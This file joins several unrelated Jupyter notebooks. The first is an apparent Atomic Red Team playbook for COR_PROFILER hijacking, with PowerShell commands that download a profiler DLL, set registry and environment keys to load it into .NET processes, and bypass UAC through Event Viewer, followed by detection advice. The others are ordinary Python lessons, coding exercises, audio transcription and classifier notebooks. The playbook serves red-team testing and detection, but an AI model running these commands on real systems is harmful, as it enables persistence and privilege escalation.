# Adversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://attack.mitre.org/techniques/T1562) provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017)
# ## Atomic Tests
#Import the Module before running the tests.
# Checkout Jupyter Notebook at https://github.com/cyb3rbuff/TheAtomicPlaybook to run PS scripts.
Import-Module /Users/0x6c/AtomicRedTeam/atomics/invoke-atomicredteam/Invoke-AtomicRedTeam.psd1 -Force
# ### Atomic Test #1 - User scope COR_PROFILER
# Creates user scope environment variables and CLSID COM object to enable a .NET profiler (COR_PROFILER).
# The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by the Event Viewer process.
# Additionally, the profiling DLL will inherit the integrity level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity.
# If the account used is not a local administrator the profiler DLL will still execute each time the CLR is loaded by a process, however,
# the notepad process will not execute with high integrity.
#
# Reference: https://redcanary.com/blog/cor_profiler-for-persistence/
#
# **Supported Platforms:** windows
# #### Dependencies: Run with `powershell`!
# ##### Description: #{file_name} must be present
#
# ##### Check Prereq Commands:
# ```powershell
# if (Test-Path PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll) {exit 0} else {exit 1}
#
# ```
# ##### Get Prereq Commands:
# ```powershell
# New-Item -Type Directory (split-path PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll) -ErrorAction ignore | Out-Null
# Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll"
#
# ```
Invoke-AtomicTest T1574.012 -TestNumbers 1 -GetPreReqs
# #### Attack Commands: Run with `powershell`
# ```powershell
# Write-Host "Creating registry keys in HKCU:Software\Classes\CLSID\{<KEY>}" -ForegroundColor Cyan
# New-Item -Path "HKCU:\Software\Classes\CLSID\{09108e71-974c-4010-89cb-acf471ae9e2c}\InprocServer32" -Value PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll -Force | Out-Null
# New-ItemProperty -Path HKCU:\Environment -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null
# New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER" -PropertyType String -Value "{09108e71-974c-4010-89cb-acf471ae9e2c}" -Force | Out-Null
# New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -PropertyType String -Value PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll -Force | Out-Null
# Write-Host "executing eventvwr.msc" -ForegroundColor Cyan
# START MMC.EXE EVENTVWR.MSC
# ```
Invoke-AtomicTest T1574.012 -TestNumbers 1
# ### Atomic Test #2 - System Scope COR_PROFILER
# Creates system scope environment variables to enable a .NET profiler (COR_PROFILER). System scope environment variables require a restart to take effect.
# The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by any process. Additionally, the profiling DLL will inherit the integrity
# level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. If the account used is not a local administrator the profiler DLL will
# still execute each time the CLR is loaded by a process, however, the notepad process will not execute with high integrity.
#
# Reference: https://redcanary.com/blog/cor_profiler-for-persistence/
#
# **Supported Platforms:** windows
# Elevation Required (e.g. root or admin)
# #### Dependencies: Run with `powershell`!
# ##### Description: #{file_name} must be present
#
# ##### Check Prereq Commands:
# ```powershell
# if (Test-Path PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll) {exit 0} else {exit 1}
#
# ```
# ##### Get Prereq Commands:
# ```powershell
# New-Item -Type Directory (split-path PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll) -ErrorAction ignore | Out-Null
# Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll"
#
# ```
Invoke-AtomicTest T1574.012 -TestNumbers 2 -GetPreReqs
# #### Attack Commands: Run with `powershell`
# ```powershell
# Write-Host "Creating system environment variables" -ForegroundColor Cyan
# New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null
# New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -PropertyType String -Value "{09108e71-974c-4010-89cb-acf471ae9e2c}" -Force | Out-Null
# New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -PropertyType String -Value PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll -Force | Out-Null
# ```
Invoke-AtomicTest T1574.012 -TestNumbers 2
# ### Atomic Test #3 - Registry-free process scope COR_PROFILER
# Creates process scope environment variables to enable a .NET profiler (COR_PROFILER) without making changes to the registry. The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by PowerShell.
#
# Reference: https://redcanary.com/blog/cor_profiler-for-persistence/
#
# **Supported Platforms:** windows
# #### Dependencies: Run with `powershell`!
# ##### Description: #{file_name} must be present
#
# ##### Check Prereq Commands:
# ```powershell
# if (Test-Path PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll) {exit 0} else {exit 1}
#
# ```
# ##### Get Prereq Commands:
# ```powershell
# New-Item -Type Directory (split-path PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll) -ErrorAction ignore | Out-Null
# Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll"
#
# ```
Invoke-AtomicTest T1574.012 -TestNumbers 3 -GetPreReqs
# #### Attack Commands: Run with `powershell`
# ```powershell
# $env:COR_ENABLE_PROFILING = 1
# $env:COR_PROFILER = '{09108e71-974c-4010-89cb-acf471ae9e2c}'
# $env:COR_PROFILER_PATH = 'PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll'
# POWERSHELL -c 'Start-Sleep 1'
# ```
Invoke-AtomicTest T1574.012 -TestNumbers 3
# ## Detection
# For detecting system and user scope abuse of the COR_PROFILER, monitor the Registry for changes to COR_ENABLE_PROFILING, COR_PROFILER, and COR_PROFILER_PATH that correspond to system and user environment variables that do not correlate to known developer tools. Extra scrutiny should be placed on suspicious modification of these Registry keys by command line tools like wmic.exe, setx.exe, and [Reg](https://attack.mitre.org/software/S0075), monitoring for command-line arguments indicating a change to COR_PROFILER variables may aid in detection. For system, user, and process scope abuse of the COR_PROFILER, monitor for new suspicious unmanaged profiling DLLs loading into .NET processes shortly after the CLR causing abnormal process behavior.(Citation: Red Canary COR_PROFILER May 2020) Consider monitoring for DLL files that are associated with COR_PROFILER environment variables.
| playbook/tactics/privilege-escalation/T1574.012.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Basic Programming
# - Please use an English input method for all code input
print('hello world')
print('hello')  # fixed: Python 3 requires parentheses around print arguments
# ## Writing a simple program
# - Area of a circle: area = radius \* radius \* 3.1415
radius = 1.0
area = radius * radius * 3.14 # assign the result of the right-hand side to the variable area
# a variable must be given an initial value!!!
# radius: a variable. area: a variable!
# float type
print(area)
# ### In Python you do not need to declare data types
# ## Reading input from the console
# - input reads a string
# - eval
radius = input('Please enter the radius') # input returns a string
radius = float(radius)
area = radius * radius * 3.14
print('The area is:', area)
# - In Jupyter, press Shift + Tab to pop up the documentation
# ## Variable naming rules
# - Composed of letters, digits, and underscores
# - Cannot start with a digit \*
# - Identifiers cannot be keywords (this can actually be forced, but it is very poor practice for code style)
# - Can be of any length
# - camelCase naming
# ## Variables, assignment statements, and assignment expressions
# - Variable: informally, a quantity that can change
# - x = 2 \* x + 1 is an equation in mathematics, but in a programming language it is an assignment expression
# - test = test + 1 \* a variable must have a value before it appears on the right-hand side of an assignment
# ## Simultaneous assignment
# var1, var2, var3... = exp1, exp2, exp3...
# ## Defining constants
# - Constant: an identifier for a fixed value, useful when the value is used many times, e.g. PI
# - Note: in some other languages a defined constant cannot be changed, but in Python everything is an object, so constants can still be reassigned
# ## Numeric data types and operators
# - Python has two numeric types (int and float), supporting addition, subtraction, multiplication, division, modulo, and exponentiation
# <img src = "../Photo/01.jpg"></img>
# ## Operators /, //, **
# ## Operator %
# ## EP:
# - What is 25/4? How would you rewrite it so the result is an integer?
# - Read a number and determine whether it is odd or even
# - Advanced: read a number of seconds and write a program to convert it to minutes and seconds; e.g. 500 seconds equals 8 minutes 20 seconds
# - Advanced: if today is Saturday, what day of the week will it be 10 days later? Hint: day 0 of each week is Sunday
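# A hedged sketch of the two advanced exercises above (the function names are illustrative; `divmod` does the minutes/seconds split in one call):

```python
def to_minutes_seconds(seconds):
    # e.g. 500 seconds -> 8 minutes and 20 seconds
    return divmod(seconds, 60)

def weekday_after(today, days):
    # day 0 of the week is Sunday, so Saturday is day 6
    return (today + days) % 7
```

# For example, `weekday_after(6, 10)` returns 2, i.e. Tuesday.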
# ## Scientific notation
# - 1.234e+2
# - 1.234e-2
# ## Evaluating expressions and operator precedence
# <img src = "../Photo/02.png"></img>
# <img src = "../Photo/03.png"></img>
# ## Augmented assignment operators
# <img src = "../Photo/04.png"></img>
# ## Type conversion
# - float -> int
# - rounding with round
# ## EP:
# - If the annual tax rate is 0.06%, how much tax is due on an annual income of 197.55e+2? (round the result to 2 decimal places)
# - You must use scientific notation
# # Project
# - Write a loan calculator in Python: the input is the monthly payment (monthlyPayment) and the output is the total payment (totalpayment)
# 
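# A minimal sketch of the project (hedged: the exercise image is not reproduced here, so taking the number of years as a second input is an assumption):

```python
def total_payment(monthly_payment, years):
    # total repaid over the life of the loan (assumed formula: monthly payment * 12 * years)
    return monthly_payment * 12 * years
```

# For example, a monthly payment of 1000 over 5 years repays 60000 in total.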
# # Homework
# - 1
# <img src="../Photo/06.png"></img>
celsius = eval(input('Please enter the temperature in Celsius'))
fahrenheit = (9/5) * celsius + 32
print(fahrenheit)
# - 2
# <img src="../Photo/07.png"></img>
radius = eval(input('Please enter the radius'))
length = eval(input('Please enter the height'))
area = radius * radius * 3.1415
volume = area * length
print(volume)
round(volume, 1)
# - 3
# <img src="../Photo/08.png"></img>
feet = eval(input('Please enter a number of feet'))
meters = feet * 0.305
print(meters)
# - 4
# <img src="../Photo/10.png"></img>
M = eval(input('Please enter the amount of water in kilograms'))
initialTemperature = eval(input('Please enter the initial temperature'))
finalTemperature = eval(input('Please enter the final temperature'))
Q = M * (finalTemperature - initialTemperature) * 4184
print(Q)
# - 5
# <img src="../Photo/11.png"></img>
balance = eval(input('Please enter the balance'))
interest_rate = eval(input('Please enter the annual interest rate'))
interest = balance * (interest_rate / 1200)
print(interest)
round(interest, 5)
# - 6
# <img src="../Photo/12.png"></img>
v0 = eval(input('Please enter the initial velocity in m/s'))
v1 = eval(input('Please enter the final velocity in m/s'))
t = eval(input('Please enter the time in seconds over which the velocity changes'))
a = (v1 - v0) / t
print(a)
round(a, 4)
# - 7 (advanced)
# <img src="../Photo/13.png"></img>
# - 8 (advanced)
# <img src="../Photo/14.png"></img>
a,b = eval(input('>>'))
print(a,b)
print(type(a),type(b))
a = eval(input('>>'))
print(a)
| 7.16(1).ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# ## Import Libraries
import torch
import librosa
import pandas as pd
from pydub import AudioSegment
from transformers import Wav2Vec2ForCTC, Wav2Vec2Tokenizer
# ## Load Pretrained Model
tokenizer = Wav2Vec2Tokenizer.from_pretrained("facebook/wav2vec2-base-960h")
model = Wav2Vec2ForCTC.from_pretrained("facebook/wav2vec2-base-960h")
# ## Load Audio in 16k
audio = AudioSegment.from_file("Audio/audio.flac", "flac")
# ## Length of Each Audio Snippet in ms
# +
time_slice = 20000
upper_bound = int(len(audio)/time_slice)
snip_count = upper_bound + 1
# -
# ## Split Audio File to Smaller Snippets
def SplitClips(audio, time_slice, upper_bound):
start_time = 0
end_time = start_time + time_slice
for i in range(upper_bound):
audio_snip = audio[start_time:end_time]
audio_snip.export("Audiosnips/audio{0}.flac".format(i), "flac")
start_time = end_time
end_time = end_time + time_slice
    audio_snip = audio[start_time:]  # the remainder starts where the last full slice ended
    audio_snip.export("Audiosnips/audio{0}.flac".format(i+1), "flac")
# ## Transcription to Text File
def transcript_to_text_file(snip_count):
trans = open("transcript_file.txt", mode='a', encoding='utf-8')
for i in range(snip_count):
speech, rate = librosa.load("Audiosnips/audio%d.flac" % i, sr=16000)
input_values = tokenizer(speech, return_tensors='pt').input_values
logits = model(input_values).logits
predicted_ids = torch.argmax(logits, dim=-1)
trans.write(tokenizer.decode(predicted_ids[0]) + " ")
trans.close()
# ## Split and Transcript
SplitClips(audio, time_slice, upper_bound)
# ### Transcript 15min
# %%time
transcript_to_text_file(45)
# ### Transcript 24min
# %%time
transcript_to_text_file(72)
# ## Read Transcripted Text File
file = open("transcript_file.txt", mode='r', encoding='utf-8')
print(file.read())
file.close()
| large_audio_transcript/Audio_Transcription_to_Text_File.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + [markdown] id="BGjGwPQGgwCe"
# # Century from Year
# Given a year, return the century it is in. The first century spans from the year 1 up to and including the year 100, the second - from the year 101 up to and including the year 200, etc.
#
# Example
#
# For year = 1905, the output should be
# centuryFromYear(year) = 20;
# For year = 1700, the output should be
# centuryFromYear(year) = 17.
# Input/Output
#
# [execution time limit] 4 seconds (py3)
#
# [input] integer year
#
# A positive integer, designating the year.
#
# Guaranteed constraints:
# 1 ≤ year ≤ 2005.
#
# [output] integer
#
# The number of the century the year is in.
# + id="PcbGe_uPgpn_"
from math import ceil
def centuryFromYear(year):
return ceil(year / 100)
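# An equivalent integer-only variant that needs no `math` import, shown as an alternative:

```python
def centuryFromYearInt(year):
    # adding 99 before floor division rounds any partial century up
    return (year + 99) // 100
```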
# + [markdown] id="loVUQYkIHEuJ"
# # allLongestStrings
#
# Given an array of strings, return another array containing all of its longest strings.
#
# Example
#
# For inputArray = ["aba", "aa", "ad", "vcd", "aba"], the output should be
# allLongestStrings(inputArray) = ["aba", "vcd", "aba"].
# + id="ppLYS5zzHDAr"
def allLongestStrings(inputArray):
longest = 0
result = []
for each in inputArray:
if len(each) > longest:
longest = len(each)
for each in inputArray:
if len(each) == longest:
result.append(each)
return result
# + [markdown] id="JEmaS4fq0f2N"
#
# # commonCharacterCount
# Given two strings, find the number of common characters between them.
#
# Example
#
# For s1 = "aabcc" and s2 = "adcaa", the output should be
# commonCharacterCount(s1, s2) = 3.
#
# Strings have 3 common characters - 2 "a"s and 1 "c".
# + id="kWpf0DV46Kpa"
def commonCharacterCount(s1, s2):
count = 0
for each in set(s1):
if each in s2:
count += min(s1.count(each), s2.count(each))
return count
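# The same count can be expressed with a `Counter` multiset intersection; a sketch, not the submitted solution:

```python
from collections import Counter

def commonCharacterCountV2(s1, s2):
    # & on Counters keeps the minimum multiplicity of each shared character
    return sum((Counter(s1) & Counter(s2)).values())
```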
# + [markdown] id="1VEHxQLopcbq"
# # isLucky
#
# Ticket numbers usually consist of an even number of digits. A ticket number is considered lucky if the sum of the first half of the digits is equal to the sum of the second half.
#
# Given a ticket number n, determine if it's lucky or not.
#
# Example
#
# For n = 1230, the output should be
# isLucky(n) = true;
# For n = 239017, the output should be
# isLucky(n) = false.
# + id="jBSo7INRpXKP"
def isLucky(n):
sum1 = 0
sum2 = 0
mid = len(str(n))//2
for i, v in enumerate(str(n)):
if i < mid:
sum1 += int(v)
else:
sum2 += int(v)
return sum1 == sum2
# + id="L9huFI47q0gv"
def isLucky(n):
n = list(map(int,str(n)))
l = len(n)//2
return sum(n[:l]) == sum(n[l:])
'''
This solution is noteworthy because it uses `map` to apply the int function
to all elements of an iterable. `map` is still O(n) time, but it can slightly
outperform a list comprehension when passed a builtin like `int`.
'''
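# A quick check of that claim; timings are machine-dependent, but both forms produce identical results:

```python
import timeit

digits = "239017"
t_map = timeit.timeit(lambda: list(map(int, digits)), number=10000)
t_comp = timeit.timeit(lambda: [int(c) for c in digits], number=10000)
print(t_map, t_comp)  # which is faster varies by machine and input size
```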
# + [markdown] id="dAc2cJqtKQtf"
# # sortByHeight
#
# Some people are standing in a row in a park. There are trees between them which cannot be moved. Your task is to rearrange the people by their heights in a non-descending order without moving the trees. People can be very tall!
#
# Example
#
# For a = [-1, 150, 190, 170, -1, -1, 160, 180], the output should be
# sortByHeight(a) = [-1, 150, 160, 170, -1, -1, 180, 190].
# + id="I2tyH4ivKR33"
def sortByHeight(a):
b = []
for i in a:
if i != -1:
b.append(i)
# list comprehension: b = sorted([i for i in a if i != -1])
for i in range(len(a)):
if a[i] != -1:
a[i] = min(b) #if sorted a[i] = b.pop(0)
b.remove(min(b))
return a
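# Following the hint in the comments above, a sort-once variant (a sketch; the name is mine):

```python
def sortByHeightV2(a):
    # sort the people once, then refill the non-tree slots in order
    people = iter(sorted(x for x in a if x != -1))
    return [x if x == -1 else next(people) for x in a]
```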
# + colab={"base_uri": "https://localhost:8080/", "height": 35} id="sWFgn54JmRPL" outputId="469dc6b8-a351-4e7e-f13c-8d642435159b"
"".join(list('123'))
# + [markdown] id="SLb4nNIPKjEd"
# # alternatingSums
#
# Several people are standing in a row and need to be divided into two teams. The first person goes into team 1, the second goes into team 2, the third goes into team 1 again, the fourth into team 2, and so on.
#
# You are given an array of positive integers - the weights of the people. Return an array of two integers, where the first element is the total weight of team 1, and the second element is the total weight of team 2 after the division is complete.
#
# Example
#
# For a = [50, 60, 60, 45, 70], the output should be
# alternatingSums(a) = [180, 105].
# + id="5D2eXGSpKeFs"
def alternatingSums(a):
w1 = w2 = 0
for i, v in enumerate(a):
if i % 2:
w2 += v
else:
w1 += v
return [w1, w2]
# + [markdown] id="KcGDJUdLPmEy"
# # addBorder
#
# Given a rectangular matrix of characters, add a border of asterisks(*) to it.
#
# Example
#
# For
# <pre><code>picture = ["abc",
# "ded"]
# </code></pre>
#
# the output should be
# <pre><code>addBorder(picture) = ["*****",
# "*abc*",
# "*ded*",
# "*****"]
# </code></pre>
# + id="00eukF1IPkrO"
def addBorder(p):
for each in range(len(p)):
p[each] = "*"+p[each]+"*"
p.insert(0,'*'*(len(p[0])))
p.append('*'*(len(p[0])))
return p
# + [markdown] id="n1GC2Ji6TRn7"
# # */2 areSimilar
#
# Two arrays are called similar if one can be obtained from another by swapping at most one pair of elements in one of the arrays.
#
# Given two arrays a and b, check whether they are similar.
#
# Example
#
# For a = [1, 2, 3] and b = [1, 2, 3], the output should be
# areSimilar(a, b) = true.
#
# The arrays are equal, no need to swap any elements.
#
# For a = [1, 2, 3] and b = [2, 1, 3], the output should be
# areSimilar(a, b) = true.
#
# We can obtain b from a by swapping 2 and 1 in b.
#
# For a = [1, 2, 2] and b = [2, 1, 1], the output should be
# areSimilar(a, b) = false.
#
# Any swap of any two elements either in a or in b won't make a and b equal.
# + id="pgMxB7bxTQB_"
def areSimilar(a, b):
if a == b:
return True
for i in range(len(a)):
for j in range(i+1, len(a)):
a[i], a[j] = a[j], a[i]
if a == b:
return True
a[i], a[j] = a[j], a[i]
return False
### works, but O(n**2) time complexity; fails the time constraint on large inputs
# + id="9ZLSOubdhsaK"
#*
def areSimilar(a, b):
same_items = sorted(a) == sorted(b)
differences = [i for i in range(len(a)) if a[i] != b[i]]
return len(differences) <= 2 and same_items
#Elegant
# + [markdown] id="p_9IET-LNeEu"
# ## *rectangleRotation
#
# medium · codewriting · 300
#
# A rectangle with sides equal to even integers a and b is drawn on the Cartesian plane. Its center (the intersection point of its diagonals) coincides with the point (0, 0), but the sides of the rectangle are not parallel to the axes; instead, they are forming 45 degree angles with the axes.
#
# How many points with integer coordinates are located inside the given rectangle (including on its sides)?
#
# Example
#
# For a = 6 and b = 4, the output should be
# rectangleRotation(a, b) = 23.
#
# The following picture illustrates the example, and the 23 points are marked green.
#
# <img src="https://codesignal.s3.amazonaws.com/tasks/rectangleRotation/img/rectangle.png?_tm=1582083113018" alt="">
#
# Input/Output
#
# [execution time limit] 4 seconds (py3)
#
# [input] integer a
#
# A positive even integer.
#
# Guaranteed constraints:
# 2 ≤ a ≤ 50.
#
# [input] integer b
#
# A positive even integer.
#
# Guaranteed constraints:
# 2 ≤ b ≤ 50.
#
# [output] integer
#
# The number of inner points with integer coordinates.
# + id="jrqrERVxNbQK"
import numpy as np
def rectangleRotation(a, b):
    # brute-force scan over a padded grid of candidate rotated-lattice points
    count = 0
    a1 = a//2
    b1 = b//2
    for val1 in range(-a1-5, a1+5):
        for val2 in range(-b1-5, b1+5):
            if abs(val1*np.sqrt(2)) <= a1 and abs(val2*np.sqrt(2)) <= b1:
                count += 1
    for val1 in range(-a1-(a1%2)-101, a1+(a1%2)+101, 2):
        for val2 in range(-b1-(b1%2)-101, b1+(b1%2)+101, 2):
            if abs(0.5*val1*np.sqrt(2)) <= a1 and abs(0.5*val2*np.sqrt(2)) <= b1:
                count += 1
    return count
| CS/CodeSignal_Intro.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
import matplotlib.style
import matplotlib as mpl
# +
wbcd = pd.read_csv('./data/breast-cancer-wisconsin.data.csv')
print(wbcd.shape,'\n')
wbcd['diagnosis'] = wbcd['diagnosis'].astype('int64')
print('Data types :\n', wbcd.dtypes,'\n')
col_names = list(wbcd.columns)
print('column Names = ', col_names, '\n')
# -
np.where(wbcd.isnull())
# Check for missing values in dataframe
wbcd.isnull().sum()
wbcd['bare nucleoi'].describe()
wbcd['bare nucleoi'].value_counts()
wbcd[wbcd['bare nucleoi'] == "?"]
# +
# Data cleaning: drop the unnecessary id column
wbcd.drop(['id'], axis = 1, inplace = True)
wbcd.head()
# -
wbcd['diagnosis'].value_counts()
wbcd['bare nucleoi'].replace("?", np.nan, inplace=True)
wbcd = wbcd.dropna()
wbcd['bare nucleoi'] = wbcd['bare nucleoi'].astype('int64')
type(wbcd)
wbcd['diagnosis']
wbcd['bare nucleoi'].value_counts()
wbcd['diagnosis'] = wbcd['diagnosis']/2-1
wbcd['diagnosis'].value_counts()
X = wbcd.drop(['diagnosis'], axis =1)
X_col = X.columns
# ### F-Score
# Split data in 70-30 partition
from sklearn.model_selection import train_test_split
# split the feature matrix X (not the full frame) so the target never leaks into the features
X_train, X_test, y_train, y_test = train_test_split(X, wbcd['diagnosis'], test_size = 0.3, random_state = 99)
X_train
Xtrain_p = X_train[y_train == 1]
Xtrain_n = X_train[y_train == 0]
# +
n_pos = Xtrain_p.shape[0]
n_neg = Xtrain_n.shape[0]
print('train malignant (n+):', n_pos)
print('train benign (n-):', n_neg)
# -
x_mean = X_train.mean()
xp_mean = Xtrain_p.mean()
xn_mean = Xtrain_n.mean()
print('x_mean :\n',x_mean,'\n')
print('x+_mean :\n',xp_mean,'\n')
print('x-_mean :\n',xn_mean,'\n')
# +
F_Score = np.zeros(len(X_col))
for i, col in enumerate(X_col):
    # label-based indexing keeps the means aligned with the feature columns
    FS_num = (xp_mean[col] - x_mean[col])**2 + (xn_mean[col] - x_mean[col])**2
    FS_den = ((Xtrain_p[col] - xp_mean[col])**2).sum()/(n_pos-1) + ((Xtrain_n[col] - xn_mean[col])**2).sum()/(n_neg-1)
    F_Score[i] = FS_num/FS_den
# -
F_Score
np.argsort(F_Score)[::-1]+1
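# As a cross-check, the F-score loop above can be restated in vectorized form; `fisher_scores` is a hypothetical helper that takes the positive- and negative-class feature matrices as plain arrays:

```python
import numpy as np

def fisher_scores(Xp, Xn):
    # vectorized F-score per feature: Xp is (n+, d), Xn is (n-, d)
    x_mean = np.vstack([Xp, Xn]).mean(axis=0)
    num = (Xp.mean(axis=0) - x_mean) ** 2 + (Xn.mean(axis=0) - x_mean) ** 2
    den = Xp.var(axis=0, ddof=1) + Xn.var(axis=0, ddof=1)
    return num / den
```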
# ## Models
from sklearn.neighbors import KNeighborsClassifier
# +
from sklearn.model_selection import cross_val_score
for k in range(1, 40, 2):
# only odd numbers
knn = KNeighborsClassifier(n_neighbors = k, weights='distance')
score = cross_val_score(knn, X_train, y_train, cv =5) #scoring = 'accuracy'
print('k=', k, '; Mean accuracy', score.mean().round(3), ';Std:', score.std().round(3))
# -
#
# #### Chosen parameter k = 9
# +
from sklearn import metrics
from sklearn.linear_model import LogisticRegression
from sklearn.neural_network import MLPClassifier
KNN_score = []
lr_score = []
NN_score = []
model_seq = np.array([2, 6, 3, 7, 1, 8, 4, 5, 9])-1
for i in range(len(model_seq)):
print('\nModel number: ', i+1)
xM_train=X_train[X_col[model_seq[0:i+1]]]
xM_test=X_test[X_col[model_seq[0:i+1]]]
# K-NN method
knn = KNeighborsClassifier(n_neighbors = 9, weights='distance')
knn.fit(xM_train,y_train)
y_knn_pred = knn.predict(xM_test)
mscore= metrics.accuracy_score(y_test, y_knn_pred).round(4)
KNN_score.append(mscore)
# print('metric score for KNN = ', mscore)
cm = metrics.confusion_matrix(y_test, y_knn_pred)
wbcd_cm = pd.DataFrame(data = cm, columns = ['predict: Benign', 'predict: Malignant'],
index = ['true: Benign', 'true: Malignant'])
print(wbcd_cm)
# Logistic Regression method
lr = LogisticRegression(solver='lbfgs') #instantiate the model-step 1
lr.fit(xM_train,y_train)
y_lr_pred = lr.predict(xM_test)
m_score= metrics.accuracy_score(y_test, y_lr_pred).round(4)
lr_score.append(m_score)
# print('metric score for lr = ', m_score)
# Neural Network
clf = MLPClassifier(solver='lbfgs', alpha=1e-3, hidden_layer_sizes=(5, 5, 5, 5))
clf.fit(xM_train, y_train)
y_NN_pred = clf.predict(xM_test)
m_NN_score= metrics.accuracy_score(y_test, y_NN_pred).round(4)
NN_score.append(m_NN_score)
# print('metric score for NN = ',m_NN_score)
from tabulate import tabulate
print(tabulate(np.transpose([KNN_score, lr_score, NN_score]), headers=['K-NN', 'Log-Reg', 'NN']))
# +
# xM5_train = X_train[X_col[model_seq[0:5+1]]]
# xM5_test = X_test[X_col[model_seq[0:5+1]]]
# knn = KNeighborsClassifier(n_neighbors = 9, weights='distance')
# knn.fit(xM5_train,y_train)
# y_pred = knn.predict(xM5_test)
# cm = metrics.confusion_matrix(y_test, y_pred)
# cm
# +
# from sklearn.linear_model import LogisticRegression
# +
# lr = LogisticRegression(solver='lbfgs') #instantiate the model-step 1
# xM_train=X_train[X_col[model_seq[0:1+1]]]
# xM_test=X_test[X_col[model_seq[0:1+1]]]
# lr.fit(xM_train,y_train)
# y_pred = lr.predict(xM_test)
# m_score= metrics.accuracy_score(y_test, y_pred).round(4)
# print(m_score)
# +
# from sklearn.neural_network import MLPClassifier
# clf = MLPClassifier(solver='lbfgs', alpha=1e-3, hidden_layer_sizes=(5, 2))
# xM_train=X_train[X_col[model_seq[0:2+1]]]
# xM_test=X_test[X_col[model_seq[0:2+1]]]
# clf.fit(xM_train, y_train)
# +
# y_pred = clf.predict(xM_test)
# m_score= metrics.accuracy_score(y_test, y_pred).round(4)
# print(m_score)
| WBCD_with_FScore/WBCD_With_FScore.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + colab={"base_uri": "https://localhost:8080/"} id="4Fefev6qnCPS" outputId="ff2ad574-cf75-4386-b3d3-f187a8c6aa14"
# %tensorflow_version 2.x
import tensorflow as tf;
print("GPU device name:",tf.test.gpu_device_name())
print("Num GPUs Available: ", len(tf.config.experimental.list_physical_devices('GPU')))
# + colab={"base_uri": "https://localhost:8080/", "height": 113} id="xRSnZ12XUie4" outputId="c8e2b64f-b70a-47d1-d330-b6492e0d22aa"
#import tensorflow as tf;
import matplotlib.pyplot as plt
import tensorflow.keras as keras
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense #this layer will be densely connected
import cv2;#import the openCV module
import math;
import random;
import sys;
import numpy as np#for array/matrix calculations
from matplotlib import pyplot as plt #for plotting graphs
#to show the graph figure in the jupyter notebook (show it underneath this code)
# %matplotlib inline
orgimg=cv2.imread('pyramid2.jpeg')#training image
img=cv2.cvtColor(orgimg,cv2.COLOR_BGR2RGB);
orgimg_label=cv2.imread('pyramid2_label.jpeg')#training labels
img_label=cv2.cvtColor(orgimg_label,cv2.COLOR_BGR2RGB);
org_test_img=cv2.imread('pyramid1.jpeg')#test image
img_test=cv2.cvtColor(org_test_img,cv2.COLOR_BGR2RGB);
plt.subplot(131);plt.imshow(img);plt.title('training');plt.axis('off')
plt.subplot(132);plt.imshow(img_label);plt.title('labels');plt.axis('off');
plt.subplot(133);plt.imshow(img_test);plt.title('testing');plt.axis('off');
plt.show()
# + id="Zca1LkIJVlBV"
#load the training data
width=img.shape[1];height=img.shape[0];
No_training_samples=30000;
training_data=np.zeros([No_training_samples,3]);
